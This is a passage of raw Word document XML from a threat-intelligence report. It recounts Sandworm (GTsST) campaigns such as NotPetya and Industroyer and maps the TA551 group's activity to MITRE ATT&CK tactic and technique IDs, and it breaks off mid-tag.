      <w:r w:rsidR="002266EB">
        <w:t xml:space="preserve">In 2016, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002266EB">
        <w:t>GTsST</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002266EB">
        <w:t xml:space="preserve"> actors conducted a cyber-intrusion campaign against a Ukrainian electrical transmission company and deployed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002266EB">
        <w:t>CrashOverride</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002266EB">
        <w:t xml:space="preserve"> malware (also known as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002266EB">
        <w:t>Industroyer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002266EB">
        <w:t xml:space="preserve">) specifically designed to attack power grids. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9C748F" w14:textId="12BCB8D5" w:rsidR="002266EB" w:rsidRDefault="00A1238F" w:rsidP="002266EB">
      <w:r>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:r w:rsidR="002266EB">
        <w:t xml:space="preserve">In June 2017, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002266EB">
        <w:t>GTsST</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002266EB">
        <w:t xml:space="preserve"> actors deployed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002266EB">
        <w:t>NotPetya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002266EB">
        <w:t xml:space="preserve"> disruptive malware against Ukrainian financial, energy, and government organizations. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002266EB">
        <w:t>NotPetya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002266EB">
        <w:t xml:space="preserve"> masqueraded as ransomware, had a large collateral impact, and caused damage to millions of devices globally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50305862" w14:textId="604281AC" w:rsidR="002266EB" w:rsidRDefault="00A1238F" w:rsidP="002266EB">
      <w:r>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:r w:rsidR="002266EB">
        <w:t xml:space="preserve">In 2018, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002266EB">
        <w:t>GTsST</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002266EB">
        <w:t xml:space="preserve"> actors deployed data-deletion malware against the Winter Olympics and Paralympics and separately targeted home and office routers worldwide using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002266EB">
        <w:t>VPNFilter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002266EB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BB778C" w14:textId="1764E5E5" w:rsidR="002266EB" w:rsidRDefault="00A1238F" w:rsidP="002266EB">
      <w:r>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:r w:rsidR="002266EB">
        <w:t xml:space="preserve">The U.S. Government, the Government of Canada, and UK Government have also attributed the October 2019 large-scale, disruptive cyber operations against a range of Georgian web hosting providers to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002266EB">
        <w:t>GTsST</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002266EB">
        <w:t>. This activity resulted in websites—including sites belonging to the Georgian government, courts, non-government organizations (NGOs), media, and businesses—being defaced and interrupted the service of several national broadcasters.[21]22][23]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E62ECB" w14:textId="77777777" w:rsidR="002266EB" w:rsidRDefault="002266EB" w:rsidP="002266EB"/>
    <w:p w14:paraId="349E0208" w14:textId="2B4F9B7C" w:rsidR="002266EB" w:rsidRDefault="00A1238F" w:rsidP="002266EB">
      <w:r>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:r w:rsidR="002266EB">
        <w:t xml:space="preserve">Also known as: ELECTRUM, IRON VIKING, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002266EB">
        <w:t>Quedagh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002266EB">
        <w:t xml:space="preserve">, the Sandworm Team, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002266EB">
        <w:t>Telebots</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002266EB">
        <w:t>, VOODOO BEAR [24]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E668ED" w14:textId="77777777" w:rsidR="00833514" w:rsidRDefault="00833514" w:rsidP="00706361"/>
    <w:p w14:paraId="15F3BD2A" w14:textId="77777777" w:rsidR="00E01554" w:rsidRDefault="00E01554">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="131" w:name="_Toc110935541"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="131"/>
    <w:p w14:paraId="46AFC303" w14:textId="2CBAB587" w:rsidR="007074DF" w:rsidRDefault="007074DF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="338DF2DC" w14:textId="0CBDD435" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="007074DF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="132" w:name="_Toc153480902"/>
      <w:r>
        <w:t>TA551</w:t>
      </w:r>
      <w:bookmarkEnd w:id="132"/>
    </w:p>
    <w:p w14:paraId="67AAC2F4" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="005B4630" w:rsidRDefault="007074DF" w:rsidP="007074DF">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="133" w:name="_Toc153480903"/>
      <w:r>
        <w:t>ATT&amp;CK Technique Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="133"/>
    </w:p>
    <w:p w14:paraId="3EBEFE26" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="007074DF" w:rsidRDefault="007074DF" w:rsidP="007074DF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Group </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TechChain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for G0127 - TA551 is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4028CE92" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="007074DF" w:rsidRDefault="007074DF" w:rsidP="007074DF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group ATT&amp;CK attribution is Unknown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78899DEA" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="007074DF" w:rsidRDefault="007074DF" w:rsidP="007074DF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group TCERT attribution is EMPTY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527C02E8"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0043 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Reconnaissance ['T1589.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A886382"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 xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1589.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Gather Victim Identity Information&gt;:Email Addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5E5B46"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0042 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Resource Development []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E07FC0"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0001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Initial Access ['T1566.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A918AC4" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="007B3D43" w:rsidRDefault="007074DF" w:rsidP="006539AC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3D43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1566.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3D43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B3D43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B3D43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C856CE0"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0002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution ['T1204.002', 'T1059.003']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AEA7E4" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="007B3D43" w:rsidRDefault="007074DF" w:rsidP="006539AC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3D43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1204.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3D43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;User Execution&gt;:Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086B997E"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 xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1059.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EC2B13"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0003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Persistence []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593D497F"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0004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Privilege Escalation []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3985EC"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0005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Evasion ['T1218.005', 'T1027.003', 'T1218.011', 'T1218.010', 'T1036', 'T1027']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD38114"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 xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1218.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Binary Proxy Execution&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mshta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="590BCE01" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="00C5758A" w:rsidRDefault="007074DF" w:rsidP="006539AC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C5758A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1027.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C5758A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obfuscated Files or Information&gt;:Steganography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EAF260" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="009912FB" w:rsidRDefault="007074DF" w:rsidP="006539AC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009912FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1218.011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009912FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Binary Proxy Execution&gt;:Rundll32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346129F0"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 xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1218.010 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Binary Proxy Execution&gt;:Regsvr32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E92A698"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Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1036 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Masquerading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0DD6DC"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Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1027 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Obfuscated Files or Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF86DE5"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0006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Credential Access []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719CB7F7"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0007 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Discovery []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244A6D67"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0008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Lateral Movement []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5653C6D5"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0009 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Collection []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FFBEFB"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0011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Command and Control ['T1568.002', 'T1105', 'T1071.001', 'T1132.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4E88B5"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 xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1568.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Dynamic Resolution&gt;:Domain Generation Algorithms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDF8CAD" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="009912FB" w:rsidRDefault="007074DF" w:rsidP="006539AC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="009912FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009912FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1105 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009912FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
